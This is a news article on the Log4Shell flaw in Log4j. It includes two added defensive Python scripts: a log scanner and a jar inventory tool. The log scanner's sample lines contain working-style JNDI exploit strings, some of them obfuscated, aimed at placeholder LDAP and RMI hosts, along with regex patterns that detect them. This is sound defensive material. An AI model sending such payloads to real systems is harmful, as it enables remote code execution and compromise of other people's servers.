Log4Shell is scary: an extremely widespread and easy-to-exploit vulnerability. Hurry up

The zero-day flaw CVE-2021-44228, christened Log4Shell, represents a major cybersecurity problem that will take months, even years, to resolve completely, because of how widely the affected code is deployed and how easy the flaw is to exploit. That is the view on which various computer security researchers converge after Log4Shell came to light on Thursday, December 9.

The United States Cybersecurity and Infrastructure Security Agency (CISA) has also weighed in, pointing out that the vulnerability affects hundreds of millions of devices and that "no single action will fix the problem", and calling it a mistake to think things can be fixed "in a week or two". CISA warns that the vulnerability will likely be exploited as a springboard for diverse and sophisticated attacks and compromises, and that the time available to protect oneself is very limited.

We remind you that Log4Shell is a vulnerability in Log4j, the open-source Java logging library used by countless applications and services, and that it allows unauthenticated remote code execution: an attacker only needs to get a crafted string into something the vulnerable application logs (a User-Agent header, a username, a chat message) for Log4j 2 to perform a JNDI lookup and fetch and run attacker-controlled code. Its reach is therefore extremely wide, which combined with the ease of exploitation makes Log4Shell a particularly serious threat, arguably more serious than Heartbleed, EternalBlue or Shellshock.
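Because the trigger travels inside whatever the application logs, the first thing a defender can do today is search existing web server logs for it. The script below is an added example written for this article, not code from the page or from the Log4j project: it normalises the obfuscations attackers use to dodge a naive search for `${jndi:` (URL encoding, nested `${lower:…}` lookups, `${x:-default}` substitutions) and then reports the lookup scheme and the host each request tried to reach. The log lines are constructed for the demo and use documentation address ranges.

```python
"""Spot Log4Shell (CVE-2021-44228) exploitation attempts in web server logs.

Added example, not part of the original article. The sample log lines below
are constructed for the demo; the addresses come from documentation ranges.
"""
import re
import urllib.parse

# Log4j 2 resolves nested lookups before the outer one, so attackers hide the
# trigger behind ${lower:j}, ${upper:...} or ${something:-default} wrappers.
_CASE_LOOKUP = re.compile(r"\$\{\s*(?:lower|upper)\s*:\s*([^{}]*)\}", re.IGNORECASE)
_DEFAULT_VALUE = re.compile(r"\$\{[^{}]*:-([^{}]*)\}")
# The resolved trigger: ${jndi:<scheme>://<host[:port]>/...}
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:/*([^/}\s]+)", re.IGNORECASE)

# Constructed Apache-style access log lines (not real traffic).
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.6 - - [10/Dec/2021:10:00:02 +0000] "GET / HTTP/1.1" 200 12 "-" "${jndi:ldap://198.51.100.23:1389/a}"',
    '10.0.0.7 - - [10/Dec/2021:10:00:03 +0000] "GET / HTTP/1.1" 200 12 "-" "${${lower:j}ndi:${lower:l}dap://198.51.100.23:1389/b}"',
    '10.0.0.8 - - [10/Dec/2021:10:00:04 +0000] "GET / HTTP/1.1" 200 12 "-" "${${::-j}${::-n}${::-d}${::-i}:rmi://203.0.113.7:1099/o}"',
    '10.0.0.9 - - [10/Dec/2021:10:00:05 +0000] "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2F192.0.2.9%2Fa%7D HTTP/1.1" 200 12 "-" "curl/7.79"',
    '10.0.0.10 - - [10/Dec/2021:10:00:06 +0000] "GET /docs/jndi-tutorial.html HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
]


def normalize(text: str, max_rounds: int = 8) -> str:
    """Undo URL encoding and collapse nested lookups so the trigger is literal."""
    for _ in range(3):  # a few rounds covers double-encoded payloads
        decoded = urllib.parse.unquote(text)
        if decoded == text:
            break
        text = decoded
    for _ in range(max_rounds):  # innermost-first, until nothing changes
        new = _CASE_LOOKUP.sub(lambda m: m.group(1), text)
        new = _DEFAULT_VALUE.sub(lambda m: m.group(1), new)
        if new == text:
            break
        text = new
    return text


def scan_lines(lines):
    """Return (line_no, scheme, target) for every line carrying a JNDI lookup."""
    hits = []
    for no, line in enumerate(lines, start=1):
        m = _JNDI.search(normalize(line))
        if m:
            hits.append((no, m.group(1).lower(), m.group(2)))
    return hits


if __name__ == "__main__":
    for no, scheme, target in scan_lines(SAMPLE_LOG):
        print(f"line {no}: jndi lookup via {scheme} to {target}")
```

The last sample line shows why the normalisation step matters in the other direction too: the word `jndi` in a URL path is not a lookup, and only the `${...}` form is flagged. Treat the reported hosts as indicators to block and to pivot on in the rest of the estate, not as proof of compromise; a hit only shows that an attempt reached a logger.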

While, at least for now, the vulnerability appears to have been exploited primarily to deliver cryptomining malware, security researchers expect the type of attacks to evolve. Being able to execute unauthenticated remote code so easily opens up a wide range of possibilities for attackers. Steve Povolny, who leads advanced threat research at McAfee Enterprise and FireEye, observed that given the surge of activity since the flaw was discovered, it is reasonable to assume that many organizations have already been compromised. Povolny also warns that the attacks are likely to evolve.

Sean Gallagher, a researcher at Sophos, pointed out in particular that the vulnerability could be exploited by attackers trying to install remote-access and persistence tools, and that it is already being used in attempts to expose Amazon Web Services account keys.


According to Casey John Ellis, security expert and founder of Bugcrowd, the problem is far more serious than Heartbleed, as Log4j's propagation and various interdependencies are "orders of magnitude higher". Florian Roth of Nextron Systems speaks of a "0day cluster bomb": Log4Shell is a vulnerability that can potentially spawn hundreds, even thousands, of further zero-day flaws in all kinds of software.


And specifically on how widespread the problem is, Jaana Dogan, lead engineer at AWS, provides additional context:



The immediate action to take to eliminate the flaw is to update Log4j to at least version 2.15.0, which requires Java 8 (the 2.15.0 fix was itself superseded by 2.16.0 and 2.17.0 after follow-up issues were found, so take the latest release available). Those who cannot update Log4j because of complex interdependencies can resort to partial, temporary mitigations, such as removing the JndiLookup class from the log4j-core jar, which are well summarized in this complete and in-depth collection on Log4Shell.
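Updating presupposes knowing where Log4j actually is, and the interdependencies mentioned above mean it is often buried inside application archives rather than installed on its own. The following scanner is an added example for this article, not the project's own tooling or the collection linked above: it walks a directory, opens every `.jar`/`.war`/`.ear` including archives nested inside them, reads the log4j-core version from the Maven `pom.properties` the jar carries, and checks whether `JndiLookup.class` is still present, so that a copy patched by upgrade and a copy mitigated by deleting the class are told apart from one that is still exposed. The fix threshold is the article's 2.15.0 and is kept in one constant so it can be raised; the archives it scans are constructed fixtures written to a temporary directory.

```python
"""Inventory Log4j 2 copies on disk and classify them for CVE-2021-44228.

Added example, not from the original article or the Log4j project. It reads
each .jar/.war/.ear, including archives nested inside them, and reports the
log4j-core version plus whether JndiLookup.class (the class that performs the
JNDI lookup, and which the interim mitigation deletes) is present.
"""
import io
import os
import re
import tempfile
import zipfile

POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
JNDI_LOOKUP = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
ARCHIVE_SUFFIXES = (".jar", ".war", ".ear", ".zip")
# Fix version named in the article; raise it as later advisories direct.
FIXED_VERSION = (2, 15, 0)


def parse_version(text):
    """'2.14.1' -> (2, 14, 1); tolerates qualifiers such as '2.0-beta9'."""
    nums = [int(n) for n in re.findall(r"\d+", text)]
    return tuple((nums + [0, 0, 0])[:3])


def classify(version, has_jndi_lookup):
    """Decide what a copy of log4j-core means for CVE-2021-44228."""
    if not has_jndi_lookup:
        return "no-jndilookup"  # class removed, or a 1.x jar that never had it
    if version is None:
        return "review"  # lookup present but version unreadable: inspect by hand
    if version >= FIXED_VERSION:
        return "patched"
    return "vulnerable"


def inspect_archive(zf, label, findings):
    """Record this archive's log4j-core status, then descend into nested archives."""
    names = sorted(zf.namelist())
    version = None
    if POM_PROPS in names:
        for line in zf.read(POM_PROPS).decode("utf-8", "replace").splitlines():
            if line.startswith("version="):
                version = parse_version(line.split("=", 1)[1].strip())
    has_lookup = JNDI_LOOKUP in names
    if version is not None or has_lookup:
        findings.append((label, version, classify(version, has_lookup)))
    for name in names:  # fat jars, WARs and EARs bundle their own log4j-core
        if name.lower().endswith(ARCHIVE_SUFFIXES):
            try:
                with zipfile.ZipFile(io.BytesIO(zf.read(name))) as inner:
                    inspect_archive(inner, f"{label}!{name}", findings)
            except zipfile.BadZipFile:
                pass
    return findings


def scan_tree(root):
    """Return (label, version, status) for every log4j-core found under root."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for f in sorted(files):
            if f.lower().endswith(ARCHIVE_SUFFIXES):
                path = os.path.join(dirpath, f)
                try:
                    with zipfile.ZipFile(path) as zf:
                        inspect_archive(zf, os.path.relpath(path, root), findings)
                except zipfile.BadZipFile:
                    pass
    return findings


def build_fixtures(root):
    """Write constructed archives (not real Log4j builds) to exercise the scanner."""
    def jar(path, version, with_lookup):
        with zipfile.ZipFile(path, "w") as zf:
            zf.writestr(POM_PROPS, f"version={version}\nartifactId=log4j-core\n")
            zf.writestr("org/apache/logging/log4j/core/Logger.class", b"\xca\xfe\xba\xbe")
            if with_lookup:
                zf.writestr(JNDI_LOOKUP, b"\xca\xfe\xba\xbe")
    jar(os.path.join(root, "log4j-core-2.14.1.jar"), "2.14.1", True)
    jar(os.path.join(root, "log4j-core-2.14.1-stripped.jar"), "2.14.1", False)
    jar(os.path.join(root, "log4j-core-2.15.0.jar"), "2.15.0", True)
    inner = os.path.join(root, "inner.jar")
    jar(inner, "2.14.1", True)
    with zipfile.ZipFile(os.path.join(root, "app.war"), "w") as war:
        war.write(inner, "WEB-INF/lib/log4j-core-2.14.1.jar")
    os.remove(inner)


def demo():
    """Build the fixtures in a temp dir, scan it, and return the findings."""
    with tempfile.TemporaryDirectory() as root:
        build_fixtures(root)
        return scan_tree(root)


if __name__ == "__main__":
    for label, version, status in demo():
        print(f"{status:14} {version} {label}")
```

Run it against a real tree with `scan_tree("/opt")` or similar. Two caveats a practitioner should keep in mind: a jar rebuilt or shaded by a vendor may lack `pom.properties`, which is why the scanner still reports `review` whenever `JndiLookup.class` is present without a readable version, and a `patched` verdict only says the copy on disk is new enough; the running process has to be restarted for it to matter.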